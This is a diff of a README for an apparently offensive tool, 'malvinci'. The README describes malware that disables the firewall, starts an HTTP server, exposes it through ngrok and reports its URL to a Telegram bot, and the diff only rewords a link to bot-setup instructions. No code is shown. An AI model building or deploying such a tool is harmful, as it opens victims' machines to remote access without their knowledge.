mazidefied/malvinci/README.md

 This simple script will introduce a new type of malware that will turn off the firewall, start an HTTP server, forward its port through ngrok, and send the URL of the server through a Telegram bot.

 You will need to create a new Telegram BOT.
-Follow the steps here to create one!
-[Follow the steps](https://core.telegram.org/bots#6-botfather)
+[Follow the steps](https://core.telegram.org/bots#6-botfather) the steps here to create one⚡

 # How to setup